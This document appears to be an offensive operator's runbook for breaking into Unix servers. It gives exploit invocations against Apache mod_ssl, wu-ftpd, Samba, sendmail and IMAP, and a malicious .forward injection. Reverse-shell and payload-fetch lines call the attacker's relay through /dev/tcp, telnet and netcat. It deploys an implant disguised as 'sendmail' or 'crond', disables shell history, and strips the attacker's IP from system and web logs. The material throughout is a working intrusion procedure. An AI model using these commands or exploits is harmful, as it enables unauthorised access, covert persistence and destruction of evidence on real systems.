#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
#### CONNECT (or has scrubhands already done this for you?)
phone start
#### REDIAL (if using same ISP and still have floppy this is faster)
redial
#### TCPDUMP
cd /current/down
script -af tcpdump.raw
date; pwd; uname -a; ifconfig -a
tcpdump -ni ppp0
tcpdump -ni eth0
#### WORKING WINDOWS (also use "myenv" at any local prompt for pastables)
xterm &
cd /current/down
script -af script.$$
DISPLAY=:0.0
PS1="\t \h \w> "
PATH=../bin:/current/bin:/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin
export DISPLAY PS1 PATH; date; pwd; uname -a; netstat -rn ; ifconfig -a
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
#### TOUCH (see also -nslookup -trace -ping and -icmptime from a NOPEN redirector)
nslookup some.target.ip
nslookup 1.2.3.4
nslookup -query=mx target.ip
nslookup -query=mx 1.2.3.4
ping -nc 5 1.2.3.4
traceroute 1.2.3.4
traceroute -n 1.2.3.4
# or with ICMP
traceroute -I 1.2.3.4
#### INC
#### See ourtn's many options, including new triggers
ourtn -h
ourtn -H
#### Get on up there
ourtn -ue 1.2.3.4
# if that one fails you may have the wrong IP; otherwise try this
tn.spayed 1.2.3.4
#### INC TUNNEL (OLD WAY)
tunnel -localport 80 -tunnel FIRSTIP:port -target FIRSTIP -target SECONDIP
#### INC ONLY (no NOPEN)
ourtn 1.2.3.4
#### What to do?
w
# either make a working dir
mkdir /tmp/socket-root && cd /tmp/socket-root && chmod 0700 .
# or just use /tmp if deleting immediately...
cd /tmp && ls -arlt && pwd
~~p
../up/noserver sendmail
chmod 700 sendmail && netstat -an | grep 40019.*LISTEN || (PATH=. D="-l 40019" s
endmail && rm sendmail) ; ls -arlt
# ps -- choose one or more
echo p | crash
ps -ef
ps -efwww
pa auxwww
# NOPEN for business... (should not need if using ourtn -ue, and
# also can be found via didthis if using ourtn)
cd /current/down
../bin/noclient 1.2.3.4:40019
######
## LOCAL PREP (can do from any local dir--paste complete blocks)
## Some of these you will not use, FYI.
######
## Unalias cp since these prompt otherwise
unalias cp
## Make sure this is right noserver
packrat -l sendmail /current/up/noserver
## Equivalently, do this step by step if you want:
## cp /current/up/noserver /current/up/sendmail
## compress -c /current/up/sendmail > /current/up/sendmail.Z
## chmod 755 /current/up/noserver /current/up/sendmail*
## uuencode /current/up/sendmail.Z sendmail.Z > /current/up/sendmail.Z.uu
## pick right poptop
cp /current/up/poptop.i586-pc-linux-gnu /current/up/pt
sum -s /current/up/pt /current/up/sendmail
chown 0:0 /current/up/pt* /current/up/sendmail*
tar -C /current/up -cvf /current/up/u.tar sendmail pt
compress -c /current/up/u.tar > /current/up/u.tar.Z
uuencode /current/up/u.tar.Z u.tar.Z > /current/up/u.tar.Z.uu
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
## Following should contain both sendmail and pt
tar tvzf /current/up/u.tar.Z
## Only need this if not using the "mostly automated" method below
gedit /current/up/u.tar.Z.uu&
## Probably don't need the rest unless target has no tar or uncompress:
uuencode /current/up/pt pt > /current/up/pt.uu
uuencode /current/up/sendmail sendmail > /current/up/sendmail.uu
uuencode /current/up/u.tar u.tar > /current/up/u.tar.uu
gedit /current/up/*.uu&
ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver"
######
-jackpop 1.2.3.4 13 REDIRECTIP 23064
## Option 3 run command on target.
## Choose offset if needed, and IN bless or not as desired.
3
############################################
###### EITHER CHOOSE THIS COMMAND
## Mostly automated method--only works if uudecode is on the target.
## AND YOU DO NOT GET AN INTERACTIVE SHELL--until NOPEN is up and
## running, that is. (The environment syntax here will fail on csh
## or tcsh, e.g. with FreeBSD.)
##
## If this fails (due to missing uudecode, for example), you will
## be dropped into a shell, instead.
######
## IF this next line comes back with OOPS you are in an interactive shell and
## something failed with the command (wrong shell? uudecode/uncompress not there?)
##
##NON-ICESKATE METHOD (using poptop):
##
##stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;s
leep 5;uudecode&&uncompress u.tar.Z&&tar xf u.tar&&PATH=. D=-l40019 sendmail&&rm
-f sendmail u.tar&&PATH=. exec pt 40019)||(echo OOPS&&exec sh)
##
####
## MODIFIED SINCE NO POPTOP AVAILABLE IN OP
##
##
stty -echo;mkdir -p /tmp/socket-root ; cd /tmp/socket-root;pwd;(R=1 export R;sle
ep 5;uudecode&&uncompress sendmail.Z&&PATH=. D=-l40019 ./sendmail&&rm -f sendmai
l)||(echo OOPS&&exec sh)
##
###### OR CHOOSE THIS COMMAND###############
## More Manual method, gives interactive shell--WHOSE CONTENTS GO ACROSS IN THE CLEAR.
######
# Command to run (some prep, then exec shell):
cd /tmp ; ls -arlt ; mkdir -p /tmp/socket-root ; cd /tmp/socket-root ; ls -alrt
; pwd ; exec sh
##########################
######
## That pops up a window connecting to port 13
######
######
## REMOTE -- Time to run NOPEN (and it inherits this session via pt)
######
# Start server listening and connect to it via poptop
# (you should see "tty should be setup...")
PATH=. D=-l40019 sendmail
PATH=. pt 40019
# Typing this next "---" string activates poptop here and
# there to connect a local noclient to the remote noserver
# via this already established TCP session.
---
######
## FINI - clean up a bit
######
## Once NOPEN is up and running, both the previous hop's
## noclient window where -jackpop was run and the shell
## window it popped up will be tied up until we're done
## on the jackladder'd target.
######
-cd /tmp
-ls /tmp/socket-root
rm -rf /tmp/socket-root
###### Bailing
## First, -exit any NOPEN sessions you started via the -tunnel,
## close that tunnel and quit out of -tunnel.
##
## Burn the NOPEN server. Post -burn/BURN on the new nopen,
## the popped up window should exit on its own. Use the "DONE"
## in the -jackpop window then.
######
-burn
BURN
DONE
######################################################## END -jackpop/nopen one-port
######################################################## END -jackpop/nopen one-port
#### CONNECT
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
../bin/noclient 1.2.3.4:40019
-nstun 1.2.3.4 40019
-rm sendmail
#### GO FREESTYLE
#### PITCHIMPAIR-LINUX
#### some.target.ip
#### 1.2.3.4
#### /tmp/socket-root
###
### BEGIN USER.MISSION File user.mission.generic.COMMON (see also ../etc/user.mission.generic.COMMON)
###
############- TOUCH
#only from redirector **SKIP**
nslookup domain
nslookup ip
nslookup -query=mx domain_name
nslookup -query=mx domain_name
############- on Solaris the ping flag is -s
ping IP
TTL OS
2 - 32 Windows for Workgroups
2 - 32 Windows 95
34 - 64 Red Hat Linux (< version 6.0)
34 - 64 Digital UNIX
34 - 64 SCO
98 - 128 Windows NT
98 - 128 Windows 95 w/MS Dialup Network Upgrade
98 - 128 Windows 98
225 - 255 UNIX
Note: recent Sun OS 5.9 boxes TTL 34-64.
################### PITCHIMPAIR INSTRUCTIONS ###################################
###
###
### begin user.mission.pitchimpair
###
### get rid of pesky spaces at beginning of lines (fixes pasted html)
:%s/^[ ]*//g
:1
#######################################################################
#
# Need a new userlist ?
#
# -ls /global/m*/MB/*/*/*/mailinfo.dat > L:/current/down/userlist
#
# (N.B. the -ls will give the mailinfo.dat file timestamps in the
# format expected by lsstamp ... see next command)
#
# ## now, LOCALLY run lsstamp userlist > userlist.sorted
# ## (lsstamp will sort the -ls lines in date order)
#
# Collection: -get /global/m1/MB/96/8/karachi:moftec/mailinfo.dat
#
#
#######################################################################
mx
:%s/LOCAL_IP/LOCALIP/g
:%s/PITCH_IP/PITCH_IP/g
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_NAME/TARGET_NAME/g
:%s/TARGET_DOMAIN/TARGET_DOMAIN/g
:%s/NETCAT_PORT/38745/g
:%s/RAT_PORT/RAT_PORT/g
:%s/RAT_NAME/sendmail/g
:%s/WORK_DIR/.scsi/g
:%s/mm-dd-yyyy/mm-dd-yyyy/g
`x
### Use this if we already own the target:
### Create /current/etc/hops.txt file
HOP1: PITCH_IP:R -lue
HOP2: TARGET_IP:R -uec
### Use something similar to this for annoying packets in the red tcpdump:
### Paste in a non-scripted window:
echo "pathcost" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "NetBeui" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "who-has" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
echo "router" >> /tmp/filters.inuse && mv /tmp/filters.inuse /tmp/filters
### in a local window, connect to pitchimpair via nopen, and start tunnels ####
### Ex: noclient 217.53.1.2:39222
cd /current/down
noclient PITCH_IP:RAT_PORT
#-readrc ../etc/norc.solaris
########################################
# INCISION to FreeBSD implant
########################################
# from local LINUX scripted window
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lue PITCH_IP
-irtun 219.238.199.144 RANDOM_PORT -z -s 80
setenv D -lNOPEN_PORT # NO = sign and use setenv
set path = (. /usr/bin /bin) # NO QUOTES and use set
~~p
/current/up/noserver cron # freebsd noserver
which cron
cron
# from NOPEN on the PITCHIMPAIR host:
-nstun 219.238.199.144:NOPEN_PORT
-cd /tmp
-lt
-rm cron
-lt
-------------------------------------
export EXPECT_PROMPT="(%|:|#|\\$)[ ]*$"
ourtn -lz TARGET_IP # or -irtun TARGET_IP PORT -lz
setenv D -lNOPEN_PORT # NO = sign and use setenv
set path = (. /usr/bin /bin) # NO QUOTES and use set
~~p
/current/up/noserver crond # freebsd noserver
which crond
crond
noclient TARGET_IP:NOPEN_PORT or -nstun TARGET_IP NOPEN_PORT
########################################
# JACKLADDER
########################################
### can be done without a redirector and will upload and execute nopen
jacktelnet.sh TARGET_IP LOCAL_IP NETCAT_PORT WORK_DIR RAT_NAME [JACKPORT]
########################################
# JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT)
########################################
### Local window, let this sit and wait:
ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1
### on PITCH: set up window for nopen callback
-nrtun 113
### on PITCH: set up tunnel for nopen upload
-tunnel
r NOPEN_UPLOAD_PORT
### on PITCH, run jackpop to tickle incision
-jackpop 202.38.128.1 110 211.40.103.194 13732
#3 run a command
/dev/ttyia2 PITCH_IP 443
yes ### let incision bless the commands
### incision will talk to your local window, then callback to your -nrtun window
###################################################
### REDIRECTING IN THRU WINDOWS
###################################################
################## SENDING TRIGGER THRU WINDOWS (2000 or XP) BOX ##############
############
##### NT4.0 doesn't allow the use of raw sockets, which is needed to send the IN trigger ##
mx
:%s/LOCAL_WINDOWS_IP/LOCAL_WINDOWS_IP/g
:%s/LOCAL_UNIX_IP/LOCAL_UNIX_IP/g
:%s/UNIX_INCISION_TRIGGER_PORT/UNIX_INCISION_TRIGGER_PORT/g
:%s/INCISION_CALLBACK_PORT/INCISION_CALLBACK_PORT/g
:%s/NOPEN_CALLBACK_PORT/NOPEN_CALLBACK_PORT/g
:%s/WIN_TARG_INTERNAL_IP/10.140.0.9/g
:%s/TARGET_IP/10.140.0.40/g
`x
## Usage: script unixredirect.eps LOCAL-WINDOWS-IP LOCAL-UNIX-IP UNIX-INCISION-TRIGGER-PORT INCISION-CALLBACK-PORT NOPEN-CALLBACK-PORT
script unixredirect.eps LOCAL_WINDOWS_IP LOCAL_UNIX_IP UNIX_INCISION_TRIGGER_POR
T INCISION_CALLBACK_PORT NOPEN_CALLBACK_PORT
### or run the following by hand
# For additional nopen connections, increment the lplisten port, but keep the same target nopen port:
# monitor redirect -tcp -lplisten RAT-PORT+1 -target TARGET-IP RAT-PORT -bind LOCAL-WIN-IP
# Ex. - monitor redirect -tcp -lplisten 47109 -target 10.1.1.3 47108 -bind 10.1.1.2
# Ex. - monitor redirect -tcp -lplisten 47110 -target 10.1.1.3 47108 -bind 10.1.1.2
monitor redirect -tcp -lplisten RAT_PORT+1 -target TARGET_IP RAT_PORT -b
ind LOCAL_WIN_IP
### On Linux box: #####################
# Once the first three windows commands are set up, you can send the trigger:
# ourtn -W LOCAL-WIN-IP:LOCAL-PORT -o RAT-PORT -p ISH-CALLBACK-PORT -i WIN-TARG-IP -ue TARGET-IP
# Ex: ourtn -W DOOBIE_IP:32654 -o 47108 -p 28345 -i 10.1.1.4 -ue 10.1.1.3
#ourtn -W LOCAL_WIN_IP:LOCAL_PORT -o RAT_PORT -p ISH_CALLBACK_PORT -i WIN_TARG_IP -ue TARGET_IP
#ourtn -W 192.168.254.253:31413 -O 41611 -C 202.154.225.27 -p 37541 -i 202.154.225.27 -ue 10.140.0.40
#ourtn -ueW 192.168.254.253:31413 -i 202.154.225.27 -C 202.154.225.27 -p 37541 -O 41611 10.140.0.40
TRAVOLTA=1 ourtn -ueW 192.168.254.22:8942 -i 10.140.0.9 -C 10.140.0.9 -p
18855 -O 7549 10.140.0.40
### Use the TRAVOLTA option to keep nopen from dying in 5 hours, only if you think the op will be extended
### If alien has issues with an nfs mount point, use the "-Q" option to ourtn and DO NOT run the following:
### -lt /, df -k; otherwise, you'll tie up your window and will need to kill the process.
### It's better NOT to run nopen built-ins on alien so that you can kill something if it hangs.
incision trigger = UNIX_INCISION_TRIGGER_PORT
incision callback = INCISION_CALLBACK_PORT
nopen callback = NOPEN_CALLBACK_PORT
# on windows side:
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT -target TARGET_IP NOPE
N_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+1 -target TARGET_IP NO
PEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
background redirect -tcp -lplisten NOPEN_CALLFORWARD_PORT+2 -target TARGET_IP NO
PEN_CALLFORWARD_PORT -bind LOCAL_WINDOWS_IP
-listen NOPEN_CALLFORWARD_PORT
noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+1
#noclient LOCAL_WINDOWS_IP:NOPEN_CALLFORWARD_PORT+2
#### To kill one server first use it to start a new one (new one won't burn)
D=-l23477 PATH=. sendmail
-burnBURN
# Connect to nopen; suggest using the port override option (-o) above for simplicity
# For additional windows, you and the windows person must increment the redirected port
# Ex. - noclient 10.1.1.2:47108
# Ex. - noclient 10.1.1.2:47109
#noclient 10.1.1.2:RAT_PORT+1
###########################################################
# YES - for HPUX
###########################################################
./yes 127.0.0.1 100083 1 PROGRAM_PORT 0x40062ea8 'mkdir /tmp/.scsi;cd /tmp/.scsi
&& /usr/bin/telnet PITCH_IP NETCAT_PORT </dev/console |uudecode 2>&1 > /dev/nul
l 2>&1 && uncompress -f sendmail.Z;chmod 0700 sendmail && export D=-cPITCH_IP:NO
PEN_PORT && ./sendmail'
###########################################################
# CUP
###########################################################
-gs wearcup -h
### to have it cleanup in 3 hours:
-gs wearcup -r <remote_name> -w 3h
### to have it cleanup in 2 minutes:
-gs wearcup -r <remote_name> -w 120s
### or, run it by hand:
### locally, edit cup, and change the working dir, and time in minutes to wait for execution
#########################################################
# EVENLESSON
#########################################################
# runs against Linux systems running Apache with mod_ssl accessing
# OpenSSL 0.9.6d or earlier on x86 architectures
# May not work the first time; try increasing the number of connections to the target by 6.
# If this fails, try increasing the number of connections by 4 until you reach 40.
# Should give you a prompt on the system - may have to elevate
#-scan 443 TARGET_IP
-scan http TARGET_IP
-scan ssl TARGET_IP
### Redirector:
-tunnel
l 443 TARGET_IP
r NETCAT_PORT
### Usage:
# Usage: ./apache-ssl-linux <-i hostname> [-s scan banner] [-t arch] [-p port] [-n <connections>] [-a 0x<address>]
### Usage for default values:
./apache-ssl-linux -i TARGET_IP -t ARCH
##### Cleanup
/var/log/httpd/error_log
###########################################################
# EYEMASK
###########################################################
### IMAP masquerade
### Bring a local to get root
### for solaris
nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1
noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {145}
"| /bin/ksh -c '/bin/cat</dev/tcp/PITCH_IP/53>/tmp/sendmail;chmod +x /tmp/sendma
il;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'"
A009 DELETE .forward
A010 LOGOUT
telnet PITCH_IP 25
HELO helo
MAIL FROM: user@itt.beta.net
RCPT TO: user@itt.beta.net
DATA
.
QUIT
# echo -e "HTTP/1.0 200\n" > new
# cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail
# nc -v -l -p 53 < sendmail
# noclient -l 25
### cleanup
possible logging in /var/adm/messages (should blend in if it fails)
###########################################################
# EXPOUNDATOM
###########################################################
# Requires the target to have the wu-2.6.1 FTP service running
# Requires anonymous ftp access (determined if exploit works)
# -scan ftp TARGET_IP
# A maximum of two tries can be attempted.
#
# Syntax
# ./wu-261-linux -h
# For target list:
# ./wu-261-linux -t0 -h
# No redirection:
./wu-261-linux TARGET_IP 21 VERSION
# w/ redirection:
-tunnel
l 21 TARGET_IP
# Locally:
./wu-261-linux -a -d 127.0.0.1
./wu-261-linux -t17 -d 127.0.0.1
# Should give you root; need to upload nopen
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -latr
uncompress sendmail.Z
ls -la
chmod 700 sendmail
PATH=. sendmail
# IF it complains about the user/pass correct, then it's not vulnerable to
# our pair that we try to send it;
# Cleanup:
# /var/log/messages (look for ftp access)
# /var/adm/utmpx, wtmpx
# /var/log/secure
###################################################
### EMBERSNOUT
###################################################
# must verify that box is RH9.0 (SHRIKE) and that
# httpd is "Apache/2.0.40 (Red Hat Linux)"
-scan telnet TARGET_IP
-scan ssh TARGET_IP
-scan ssl TARGET_IP
# Notes:
# this indicates it's RH9.0 but could be either Psyche or Shrike:
# (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003)
# seeing this indicates (Shrike) because the version is bundled with it:
# SH-1.99-OpenSSH_3.5p1
# this version of Apache is needed but Psyche comes with 2.0.40-8 and
# Shrike comes with 2.0.40-21; the release is not determinable from
# a scan; just verify it's what is expected:
# Server: Apache/2.0.40 (Red Hat Linux)
#
# op box should work - depends if python is included
rpm -qf /usr/bin/python
# should see: python-base-2.2-9mdk
# if you want it to pop an xterm back to your screen:
# - make sure 6000 is listening
# - run xhost + (note: this disables X access control for ALL hosts; prefer xhost +<one host> and revoke with xhost - when done)
./es.py
Arguments: ['./es.py']
Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd"
where...
ip............target IP address
port..........target httpd TCP port number (usually 443)
packet_size...attack packet length in bytes
start_ebp.....guessed %ebp value to start with
end_ebp.......guessed %ebp value to end with
ebp_inc.......how many stack bytes to bump %ebp each time
hex_pad_byte..packet filling byte (0x0 will do randomized fill)
"cmd".........ASCII command string to be executed on target
### Locally
netstat -an |grep 6000
xhost +
########### REDIRECTED:
### Redirector:
-tunnel
l 443 TARGET_IP
r 6006 127.0.0.1 6000
r NETCAT_PORT
### In a local scripted window, set up a netcat to listen for a connection:
nc -vv -l -p NETCAT_PORT
############ No Redirection:
./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bi
n/id; /bin/ps -auxww; /bin/w)|/usr/
bin/telnet LOCALIP NETCAT_PORT"
./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -d
isplay LOCALIP:0 -e /bin/sh)"
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh</dev/tcp/LOCAL_IP/
NETCAT_PORT>&0 2>&0)"
### if the exploit stalls after a bit, hit Ctl-C to wake it up, which
### prompts you if you want to continue - hit 'y'
### watch for a connection back to your netcat window
### Once you have access........
### you need to first clean extraneous processes started by httpd
### run this to help clean:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
pwd
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&-
/usr/sbin/lsof |grep ^sh
uname -a; id
mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp
cd /tmp/.httpd-lock; pwd
which uudecode uncompress
#telnet PITCH_IP NETCAT_PORT </dev/tty | uudecode ; ls -la
#uncompress crond.Z; chmod 700 crond; ls -la
# if no uudecode, use this
### locally:
# nc -l -vv -p NETCAT_PORT < crond
-nstun TARGET_IP
-nrtun NOPEN_PORT
noclient TARGET_IP
### need to elevate so you can clean logs (use eventstart - ptrace won't work on RH9)
### Logging:
-lt /var/log/httpd
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
/var/log/httpd/ssl_error_log
/var/log/httpd/error_log
-lt /var/log
/var/log/messages
/var/log/secure
/var/log/maillog
egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_
access_log
egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl
_request_log
egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error
_log
egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_e
rror_log
egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages
egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure
egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog
####################################
### ENVELOPSWALLOW
####################################
# buffer overflow for Apache Web
./envelopswallow
# plug in the options of the matching line
# change TARGET_IP to 127.0.0.1 if using redirection
# 4.0 FreeBSD RELEASE apache-1.3.12(distro binary) apache+mod_ssl-1.3.12+2.6.2(distro binary)
# apache+php-1.3.12+3.0.15 (distro binary) apache+php-1.3.12+4.0b3 (distro binary)
# apache+ssl-1.3.9+1.37(distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_
IP:80
# 4.1 FreeBSD Apache 1.3.12(distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_
IP:80
./envelopswallow -o f -w 1000 -b 0xbfbf0000 -d -134 -r 11 -z 16 -h TARGET_
:80
### Let it run through a number of addresses (rows of PppP...ppP's), then bail if it doesn't hit
### maybe let it run an hour or less
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode;ls -la
uncompress sendmail.Z
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail
### pitch window
-nstun TARGET_IP RAT_PORT
######################################
# RFORKX
######################################
### elevation for x86/FreeBSD
# Works-on :
# FreeBSD 3.1-RELEASE (GENERIC) #0: Mon Feb 15 11:08:08 GMT 1999
# FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999
# FreeBSD 3.3-RELEASE (GENERIC) #0: Thu Sep 16 23:40:35 GMT 1999
# FreeBSD 4.0-RELEASE (GENERIC) #0: Mon Mar 20 22:50:22 GMT 2000
# FreeBSD 4.1-RELEASE (GENERIC) #0: Fri Jul 28 14:30:31 GMT 2000
# FreeBSD 4.2-RELEASE (GENERIC) #0: Mon Nov 20 13:02:55 GMT 2000
### fails on some newer versions of FreeBSD
######################################
# SM11X
######################################
Target platform 1: Red Hat Linux release 7.0 (Guinness)
ESMTP Sendmail 8.11.0/8.11.0
Target platform 2: Red Hat Linux release 7.1 (Seawolf)
ESMTP Sendmail 8.11.2/8.11.2
Target platform 3: FreeBSD 4.2-RELEASE
ESMTP Sendmail 8.11.1/8.11.1
Caldera Linux 3.1
Conectiva Linux 6.0
Conectiva Linux 7.0
Immunix Linux 7.0
SuSE Linux 7.0
SuSE Linux 7.1
SuSE Linux 7.2
"sendmail" daemon with any of the versions...
8.11
8.11.1
8.11.2
8.11.3
8.11.4
8.11.5
8.12.beta5
8.12.beta7
8.12.beta10
8.12.beta12
8.12.beta16
./sm11x -t OPTION
### look for the cksums to match; if they don't, you have 5 secs to control-c
### if you don't control-c, a second 5-sec counter will start; you'll also see the following message:
Recipient names must be specified
###### Cleanup:
/var/log/messages (brute force)
/var/log/error_log (bus error, segment. fault, server seems busy)
###################################
# EGGBARON
###################################
### Linux and FreeBSD systems running Samba 2.2.x (pre 2.2.8a) on x86 architectures.
### If successful, it has samba start a listener on port 45295 and the exploit will attempt
### to connect to it to give you root.
### If you're redirecting, you need to set up a tunnel to port 45295 on the target,
### then connect to it via netcat.
### Note that if you use the same ports on both tunnel ends, eggbaron may think that it
### was already successful because of false positives by the tunnel
### Might need to let it give "failed" messages 20-30 times before it works.
./sambal
samba-2.2.x < remote root
--------------------------
Usage: ./sambal [-bBcCdfprsStv] [host]
-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode
./sambal -t0
samba-2.2.x < remote root
--------------------------
01. samba-2.2.x - Debian 3.0 [0xbffffea2]
02. samba-2.2.x - Gentoo 1.4.x [0xbfffe890]
03. samba-2.2.x - Mandrake 8.x [0xbffff6a0]
04. samba-2.2.x - Mandrake 9.0 [0xbfffe638]
05. samba-2.2.x - Redhat 9.0 [0xbffff7cc]
06. samba-2.2.x - Redhat 8.0 [0xbffff2f0]
07. samba-2.2.x - Redhat 7.x [0xbffff310]
08. samba-2.2.x - Redhat 6.x [0xbffff2f0]
09. samba-2.2.x - Slackware 9.0 [0xbffff574]
10. samba-2.2.x - Slackware 8.x [0xbffff574]
11. samba-2.2.x - SuSE 7.x [0xbffffbe6]
12. samba-2.2.x - SuSE 8.x [0xbffff8f8]
13. samba-2.2.x - FreeBSD 5.0 [0xbfbff374]
14. samba-2.2.x - FreeBSD 4.x [0xbfbff374]
15. samba-2.2.x - NetBSD 1.6 [0xbfbfd5d0]
16. samba-2.2.x - NetBSD 1.5 [0xbfbfd520]
17. samba-2.2.x - OpenBSD 3.2 [0x00159198]
18. samba-2.2.8 - OpenBSD 3.2 (package) [0x001dd258]
19. samba-2.2.7 - OpenBSD 3.2 (package) [0x001d9230]
20. samba-2.2.5 - OpenBSD 3.2 (package) [0x001d6170]
21. Crash (All platforms) [0xbade5dee]
# EGGBARON may not work the first time using the target number as the -t flag.
# Try bruteforcing it using the -b flag. This usually works, and after very few tries.
# If this is taking a long time, try setting the bruteforce step size down using
# -B 100 (the step size is the -B option; -b selects the platform, see usage above).
# Subsequently, the -t flag will work
./sambal -b 0 TARGET_IP
####### redirected:
### via pitch:
-tunnel
l 1139 TARGET_IP 139
l 4444 TARGET_IP 45295
r NETCAT_PORT
### Locally:
./sambal -p 1139 -b 0 127.0.0.1
./sambal -f -p 1139 -b 0 127.0.0.1
# skip to nc section
### If you think you can't contact the target directly and want the exploit to
### call back to you, use the "-c WINDOWS_TARG_CALLBACK" option, and start
### a windows tunnel and unix netcat listener on port 45295
### Even if the "-c WINDOWS_TARG_CALLBACK" is used, both a callback to port 45295 _AND_
### a listener on the target's port 45295 will be created
### Locally:
./sambal -t0
./sambal -r 0xbffffb00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 200000
0 -p 1139 WIN_LOCAL
./sambal -r 0xbffffd00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 200000
0 -p 1139 WIN_LOCAL
### try connecting via netcat after any "session failed" message when redirecting:
nc PITCH_IP_or_WINDOWS_LOCAL 4444
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
uname -a
### start a netcat with the right nopen version (don't need to uuencode with /dev/tcp way)
### nc -l -v -p NETCAT_PORT < sendmail
pwd
mkdir /tmp/.scsi; cd /tmp/.scsi; pwd
ls -l /usr/bin/uudecode
/bin/cat</dev/tcp/WINDOWS_TARG_CALLBACK/NETCAT_PORT>/tmp/.scsi/sendmail
chmod 700 sendmail
PATH=. sendmail
id
### Cleanup
# look for stray process in netstat (bunch of funky chars followed by /bin/sh on port 45295)
# then kill the associated process running it:
netstat -anlp | grep 45295
ps -ef |grep <PID>
kill -9 <PID>
-cd /tmp
-lt
uname -a
### start another nopen listener on a random port (not reusing the socket)
unset I; PATH=. D=-l38475 .httpd
### elevate using your favorite local (probably EVENTSTART), then start
### another privileged noserver, connect to it, then clean up
### Logging:
/var/log/httpd/ssl_error_log
/var/log/httpd/access_log
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
##############################################################################
### EXPIRETRACHEA
#############################################################################
# close to freebsd 4.3
# copy nopen for freebsd 4.3 as noserver in /current/up; automatically uploads and connects
-scan mail TARGET_IP
# returns BorderWare MXtreme Mail Firewall
#cgi-bin/remote/expiretrachea/i586-pc-linux-gnu/opscript.borderware
#expiretrachea_helper.pl
#expiretrachea.pl -h hostname -c PITCH_IP
### redirected:
-tunnel
l 80 TARGET_IP
r 25
# 1st window
expiretrachea_helper.pl -c PITCH_IP
# 2nd window
expiretrachea.pl -h 127.0.0.1 -c PITCH_IP
# clean logs:
